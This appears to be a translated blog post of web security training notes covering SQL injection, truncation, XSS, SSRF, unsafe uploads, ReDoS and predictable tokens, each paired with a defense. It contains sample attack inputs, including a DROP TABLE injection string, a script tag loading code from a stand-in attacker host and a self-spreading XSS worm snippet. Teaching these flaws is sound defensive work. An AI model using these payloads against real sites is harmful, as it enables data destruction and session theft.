简体中文 / [English]


Web Security Study Notes

 

This article is currently an experimental machine translation and may contain errors. If anything is unclear, please refer to the original Chinese version. I am continuously working to improve the translation.

Originally meant as internal club training material—just dumping it on the blog to pad the post count.

A record of some common Web attacks and defense methods.

SQL Injection

SQL injection is a security vulnerability that occurs at the application-database layer. In short, it involves injecting SQL commands into input strings. In poorly designed programs that fail to properly validate input characters, these malicious commands may be mistakenly interpreted and executed by the database server, leading to data compromise or unauthorized access.

Incorrect example (Java):

1
2
PreparedStatement stat = conn.prepareStatement("INSERT INTO User (name, email, password, salt) VALUES ( '" + user.getName() + "', '" + user.getEmail() + "', '" + user.getPasswordHash() + "', '"+ user.getSalt() + "');");
stat.executeUpdate();

If the user inputs: name test, email 123@example.com, password xxx, the final SQL statement becomes:

1
INSERT INTO User (name, email, password, salt) VALUES ('test', '123@example.com', 'hash', 'salt');

This executes normally and does not trigger a vulnerability.

But if the username is: test','','','');DROP TABLE User;#

The resulting SQL becomes:

1
INSERT INTO User (name, email, password, salt) values('test','','','');DROP TABLE User;#','123@example.com', 'hash', 'salt');

The attacker’s input alters the original semantics of the SQL statement, causing the malicious command DROP TABLE User; to be executed.

SQL injection isn’t just for deleting databases and running away.

In cases with visible output (error-based or union-based), it can also lead to database content leakage, for example using: 1' OR '1'='1

1
SELECT * FROM User WHERE name = '1' OR '1'='1';

And in some cases, by exploiting database-specific features, attackers may even modify the file system or gain server access.

Correct approach: Use Prepared Statements to ensure semantic integrity. Never concatenate SQL strings manually!

1
2
3
4
5
6
PreparedStatement stat = conn.prepareStatement("INSERT INTO User (name, email, password, salt) VALUES (?, ?, ?, ?);");
stat.setString(1, user.getName());
stat.setString(2, user.getEmail());
stat.setString(3, user.getPasswordHash());
stat.setString(4, user.getSalt());
stat.executeUpdate();

Alternative fix: Properly escape user inputs.

1
mysqli_real_escape_string ( mysqli $link , string $escapestr ) : string

SQL Truncation

Suppose the username field in the database is defined as varchar(32).

Assume there’s already an admin user named admin.

Now, a new user tries to register with the username: admin x.

The “admin” plus 27 spaces fills exactly 32 characters. During username uniqueness checks, the server sees admin x as a new name and allows registration. However, when inserting into the database, the input gets truncated—the trailing “x” is dropped, and trailing spaces are stripped. The final stored username becomes admin, conflicting with the existing admin account. This can lead to authentication or authorization bugs.

The root cause: many SQL servers default to silently truncating overly long inputs (issuing a warning but allowing the operation to succeed).

Any field requiring uniqueness may be vulnerable to SQL truncation.

Defense: Validate input length on the backend, or configure the SQL server to strict mode, turning truncation warnings into errors.

XSS (Cross-Site Scripting)

Cross-site scripting (XSS) is a security vulnerability in web applications and a form of code injection. It allows attackers to inject code into web pages viewed by other users, potentially compromising their sessions or redirecting them to malicious sites. These attacks often involve HTML and client-side scripting languages like JavaScript.

For example, a server-side template renders:

1
<p>Username: {{ username }}</p>

If the user inputs: user<script src="https://xss.com/a.js"></script>

And no input sanitization is applied, the final HTML becomes:

1
<p>Username: user<script src="https://xss.com/a.js"></script></p>

The semantics of the HTML have now changed.

Every other user who views this username will have their browser parse and execute the <script> tag, loading and running the attacker-controlled JavaScript file from https://xss.com/a.js.

Since the script runs in the context of every user who sees it, it can bypass SOP (Same-Origin Policy) and steal improperly configured (non-HttpOnly) cookies or session tokens, redirect users to phishing pages (e.g., fake login forms), log keystrokes, or access internal network resources.

XSS worms are also possible.

Suppose the site allows changing usernames via POST to https://example.com/v1/users/change_nickname.

An attacker could craft the following payload:

1
2
3
Username: user<script src="https://xss.com/a.js"></script>
a.js:
$.post("https://example.com/v1/users/change_nickname", {name: "user<script src=\"https://xss.com/a.js\"></script>"});

Without the user’s knowledge, the malicious script forges a request (leveraging CSRF) to change the victim’s username to include the same malicious script, enabling rapid self-propagation.

Defense: Validate and escape user input, set up server-side CSP, and implement CSRF protection.

Content Security Policy (CSP) is an added security layer that helps detect and mitigate certain types of attacks, including cross-site scripting (XSS) and data injection. These attacks are often used to steal data, deface websites, or distribute malware.

CSRF

Already covered in a previous post.

SSRF (Server-Side Request Forgery)

Server-Side Request Forgery (SSRF) refers to a vulnerability where an attacker, without full server access, exploits the server to send a crafted request to internal systems that are otherwise inaccessible from the outside. SSRF attacks often target internal services behind firewalls.

For example, suppose the site has a feature where users submit a URL (e.g., https://www.baidu.com/), and the server fetches the page title or logo to generate a preview card.

But if a malicious user submits http://192.168.1.1/, the server might retrieve and expose internal network information that should not be public.

Attackers can also use other protocols like file:// or dict:// to access sensitive local files or services.

Defense: This article explains it well.

File Upload (.htaccess / Path Traversal / PHP Web Shell)

If files are saved directly using /somepath/<filename_provided_by_user>:

  • If the user names the file .htaccess, it could override Apache configurations and introduce security risks.
  • If the filename is ./../somename.php, the file may be saved to a parent directory (directory traversal).
  • Uploading a PHP file could allow arbitrary code execution on the server.

Best practices: Save uploaded files with random names (e.g., UUID), inspect file content, and secure server configurations.

For more details, see: https://misakikata.github.io/2019/05/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/

Catastrophic Backtracking in Regular Expressions

Using a flawed regex to validate email addresses:

1
^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\w]*[0-9a-zA-Z])*\.)+[a-zA-Z]{2,9})$

When the input is a@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!, catastrophic backtracking occurs. Many regex engines try all possible group combinations, causing exponential growth in processing time. This may consume excessive CPU, freeze the program, or result in a ReDoS (Regular Expression Denial of Service) attack.

Solutions: Optimize the regex (reduce nesting, avoid quantifier conflicts), avoid regex in performance-critical contexts, or use more efficient regex libraries.

Random Number Security

Suppose password reset links are generated like this:

1
https://example.com/account/reset_password?token=md5(time())

An attacker could request a reset for their own account and guess the server’s timestamp to generate valid tokens for other users, allowing unauthorized password changes.

Similarly, if private files are protected only by random filenames, those names may be predictable and lead to data exposure.

Many programming languages’ default Random or UUID libraries use timestamps as seeds, resulting in predictable outputs.

Best practice: Use cryptographically secure random generators (e.g., SecureRandom) when security is required.

Summary

Never trust user input. Always validate and sanitize.

Don’t reinvent the wheel. Study your language and framework systematically. Read official documentation and follow established best practices.

This article is licensed under the CC BY-NC-SA 4.0 license.

Author: lyc8503, Article link: https://blog.lyc8503.net/en/post/web-security/
If this article was helpful or interesting to you, consider buy me a coffee¬_¬
Feel free to comment in English below o/